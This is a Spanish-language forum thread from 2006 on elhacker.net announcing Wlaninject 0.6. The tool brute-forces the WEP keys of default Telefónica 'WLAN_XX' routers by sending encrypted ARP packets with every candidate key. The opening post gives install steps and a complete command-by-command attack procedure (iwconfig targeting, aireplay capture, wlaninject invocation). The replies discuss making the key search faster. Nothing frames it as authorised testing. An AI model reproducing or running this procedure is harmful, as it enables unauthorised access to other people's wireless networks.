elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Wireless
| | |-+  Wireless en Linux
| | | |-+  Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 18 Ir Abajo Respuesta Imprimir
Autor Tema: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!  (Leído 89,611 veces)
nilp0inter

Desconectado Desconectado

Mensajes: 125



Ver Perfil WWW
Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
« en: 11 Diciembre 2006, 08:06 »

Wlaninject es un programa capaz de generar bajo ciertas condiciones un paquete ARP proveniente del router atacado. Esto es útil cuando no hay clientes conectados y necesitamos un paquete para realizar un ataque de diccionario con (wepattack|weplab|aircrack)+wlandecrypter.
El tiempo estimado del ataque son unos 4 minutos pero en condiciones optimas de señal se puede hacer en menos.


Página oficial: http://www.fuerzaiberica.com/nil/rusoblanco/index.php?q=node/64

Instalación
Lo bajamos y en una consola situada en el directorio de bajada tecleamos:
Código:
tar -zxvf wlaninject-?.?.tar.gz
cd wlaninject-?.?
make
make install
El ultimo paso es necesario como root y solo si lo quereis instalar permanentemente.

El ejecutable se copia a /usr/local/sbin

Modo de uso
1) Nos conectamos a la red a descifrar con una contraseña cualquiera. Y nos ponemos una ip dentro del rango 192.168.1.0/24:
Código:
iwconfig {INTERFAZ} channel {CANAL}
iwconfig {INTERFAZ} essid {NOMBRE_DE_LA_RED}
iwconfig {INTERFAZ} ap {MAC_DE_LA_RED}
iwconfig {INTERFAZ} key s:AAAAAAAAAAAAA
ifconfig {INTERFAZ} 192.168.1.250 up      <--- ESTE ES IFCONFIG CON EFE !!
Si tenemos buena señal de la red usaremos estos comandos para tener más ancho de banda en la conexión y que el proceso acabe mucho antes:
Código:
iwlist {INTERFAZ} rate    <--- Al ejecutarlo nos dirá las velocidades que acepta la red y nuestra tarjeta, apuntamos la más grande (ej. 36M)
iwconfig {INTERFAZ} rate {VELOCIDAD}   <--- Aqui obligamos a que la conexión sea a la máxima velocidad disponible
Por otro lado, si la señal es pobre utilizaremos este comando para garantizar que llega el máximo número de paquetes (aunque el ataque sea mas lento):
Código:
iwconfig {INTERFAZ} rate 1M
2) Una vez conectados abriremos una consola y ejecutamos:
Código:
aireplay -4 -b {BSSID} -f1 {INTERFAZ}
Para capturar la respuesta del AP cuando mandemos el ARP cifrado con la contraseña correcta.
3) Ejecutar wlaninject con la siguiente sintaxis:
Código:
   wlaninject 0.? - (c) 2006 nilp0inter2k6_at_gmail.com
  ------------>  http://www.rusoblanco.com  <------------

 [i] modo de uso: wlaninject < -b BSSID > < -e ESSID > < -i INTERFAZ >
     -b   BSSID
     -e   ESSID
     -i   INTERFAZ

Ejemplo:
Para una red con ESSID=\"WLAN_35\" y BSSID= \"00:60:B3:XX:XX:XX\" ejecutariamos:
Código:
wlaninject -e WLAN_35 -b 00:60:B3:XX:XX:XX -i ath0
4) Durante el proceso, si todo ha salido bien, aparecerá en la ventana en la que estamos ejecutando el aireplay un paquete de datos, pulsamos y o s (según la versión) para que se guarde y a continuación Ctrl-C en la ventana de aireplay y en la de wlaninject.
El paquete se habrá guardado con un nombre parecido a este: replay_arp-XXXX-XXXXXX.cap.


Muchas gracias a axi por arreglar mis cagadas con libnet xD


Saludos y que lo disfruteis.


TODO:
  • Añadir función para que pare de enviar si se desconecta. HECHO
  • Función para el cálculo de rate. HECHO (Hay que mejorarlo)
  • Comprobar que la conexión es correcta y la ip esta dentro del rango
  • Reescribir todo el código. ES UNA CHAPUZA!!

Post original
Citar
Hola, se me ha ocurrido hoy una idea y quería preguntaros que os parece (estareis pensando que que pesado estoy con las WLAN... y vuelta la burra al trigo, no? xD).

Para los que no conozcan como descifrar descifrar* WLAN_XX sin paquetes y sin clientes os diré que hay un script para linux aqui : http://foro.elhacker.net/index.php/topic,126683.0.html.

Los que ya conoceis esta técnica sabreis que es bastante burra (mandar un arp cifrado con las 65565 posibles claves una tras otra hasta obtener respuesta); lo que se me ha ocurrido es que hay dos posibilidades para hacerlo más rápido (estoy hablando de hacerlo en 3-4 minutos en vez de 20 ó 30  :o ) :

  • El mismo método implementado en C: Con lo que ganaría mucha velocidad ya que no tendría que llamar a iwconfig cada vez que quiere cambiar la clave y a arping2 cada vez que quiere enviar un paquete arp, etc; usariamos directamente la api y sockets.
  • Usar el siguiente método tambien en C: En vez de hacer un bucle que cambie la key y llame a la rutina de enviar un arp podríamos generar un arp, y copiarlo a un fichero en memoria 65565 veces cifrado con cada una de las claves y luego enviarlos por el interfaz raw que tienen las atheros directamente con los que nos quitariamos estar cambiando la clave todo el rato.

Este segundo método es sólo teórico, es decir, no se exactamente si se puede hacer tal y como digo... pero me parece una buena idea.
Quería preguntaros a los máquinas de esto que si os parece buena idea y si lo veis factible.

Bueno ¿Qué me decis? Si veis que me rayo me lo borrais xD y aqui santas pascuas.


* Como lei el otro dia en una web muy interesante descifrar es sacar algo de una cripta xD... mejor descifrar
« Última modificación: 5 Marzo 2007, 14:51 por nilp0inter » En línea

rh3nt0n


Desconectado Desconectado

Mensajes: 2.041


carpe diem, quam minimun credula postero .


Ver Perfil
Re: Wlandecrypter sin paquetes y sin clientes... más rápido que el viento xD. NU
« Respuesta #1 en: 11 Diciembre 2006, 12:12 »

todo lo que sea ir palante bienvenido sea .. en lo que timofononica no tenga en cuenta tu trabajo respecto a sus redes inalambricas y su 'seguridad'  tus aplicaciones y metodos para WLAN_XX  siguen siendo de los mas usados y mas efecivos en lo que a su brevedad en el descifrado se refiere ..

a mi me parece perfecto .. el problema es no tener ni pajolera idea de C para poder ayudar  :-\ .. y te aseguro que no sera por ganas...

saludos
En línea

Reconoce tu tierra, tu ritmo, reconoce te a ti mismo.
Armenos


Desconectado Desconectado

Mensajes: 1.974



Ver Perfil
Re: Wlandecrypter sin paquetes y sin clientes... más rápido que el viento xD. NU
« Respuesta #2 en: 11 Diciembre 2006, 12:14 »

Tal como mi compañero rh3nt0n de C yo tampoco sé nada, pero ayudar se ayudará en todo lo que se pueda. Yo voto a favor de intentar descifrar las WLAN probando el nuevo método. Saludos.
En línea

NeoXhk

Desconectado Desconectado

Mensajes: 63



Ver Perfil
Re: Wlandecrypter sin paquetes y sin clientes... más rápido que el viento xD. NU
« Respuesta #3 en: 11 Diciembre 2006, 13:39 »

.... (estareis pensando que que pesado estoy con las WLAN... y vuelta la burra al trigo, no? xD).


para nada, adelante...!!!  :D
En línea

pianista
Colaborador
***
Desconectado Desconectado

Mensajes: 5.654


Hacking Wireless Live!


Ver Perfil WWW
Re: Wlandecrypter sin paquetes y sin clientes... más rápido que el viento xD. NUEVO
« Respuesta #4 en: 11 Diciembre 2006, 15:43 »

Creo que una idea genial seria generar todos los arps posibles dado que asi nos evitamos problemas con el arping...
En cuanto a C no se mucho pero vamos que te puedo intentar ayudar muy poquito, aun soy novato en programacion jejeje
Saludoss
En línea

Armenos


Desconectado Desconectado

Mensajes: 1.974



Ver Perfil
Re: Wlandecrypter sin paquetes y sin clientes... más rápido que el viento xD. NU
« Respuesta #5 en: 11 Diciembre 2006, 15:46 »

Creo que una idea genial seria generar todos los arps posibles dado que asi nos evitamos problemas con el arping...
En cuanto a C no se mucho pero vamos que te puedo intentar ayudar muy poquito, aun soy novato en programacion jejeje
Saludoss

No le vale el programa Hola mundo, que lo sepas ;D Saludos.

P.d. Yo todavía ni estoy a ese nivel jejeje
En línea

pianista
Colaborador
***
Desconectado Desconectado

Mensajes: 5.654


Hacking Wireless Live!


Ver Perfil WWW
Re: Wlandecrypter sin paquetes y sin clientes... más rápido que el viento xD. NUEVO
« Respuesta #6 en: 11 Diciembre 2006, 15:48 »

Armenos armenos que te meto en un bucle infinito y no sales de ahi... ;)
Por cierto yo no haria el hola mundo, haria el hola wifi!!
Saludoss
En línea

Armenos


Desconectado Desconectado

Mensajes: 1.974



Ver Perfil
Re: Wlandecrypter sin paquetes y sin clientes... más rápido que el viento xD. NU
« Respuesta #7 en: 11 Diciembre 2006, 15:54 »

Armenos armenos que te meto en un bucle infinito y no sales de ahi... ;)
Por cierto yo no haria el hola mundo, haria el hola wifi!!
Saludoss

Siempre innovando... La envidia me corroe :) Saludos.

P.d. If iwconfig armenos modo malvado then the world will crash ;)
En línea

Elena_FranciX

Desconectado Desconectado

Mensajes: 227


Sin City


Ver Perfil
Re: Wlandecrypter sin paquetes y sin clientes... más rápido que el viento xD. NUEVO
« Respuesta #8 en: 11 Diciembre 2006, 18:16 »

Tu rayate lo que haga falta y no te rayes solo en Linux (Gento) y Windows, rayate para Zaurus y Maemo (Nokia N-770)

Trataremos de seguir las lecturas, los profanos en programación (un 10 por el "nuevo" WLAN 0´5 y corecciones)
 ;D
En línea

nilp0inter

Desconectado Desconectado

Mensajes: 125



Ver Perfil WWW
Re: Wlandecrypter sin paquetes y sin clientes... más rápido que el viento xD. NU
« Respuesta #9 en: 19 Diciembre 2006, 15:29 »

Ok, os anuncio que ya está implementado en C con el primer método que expliqué y atención, tarda nada menos que 4 minutos en enviar los ARP con todas las combinaciones.  :o

Esta noche lo publicaré para que lo probeis.

Saludos!  ;D

P.D: Se os ocurre algún buen nombre para el programa??, ya sabeis que no se me dan bien xD
En línea

Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 18 Ir Arriba Respuesta Imprimir 

Ir a:  

Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines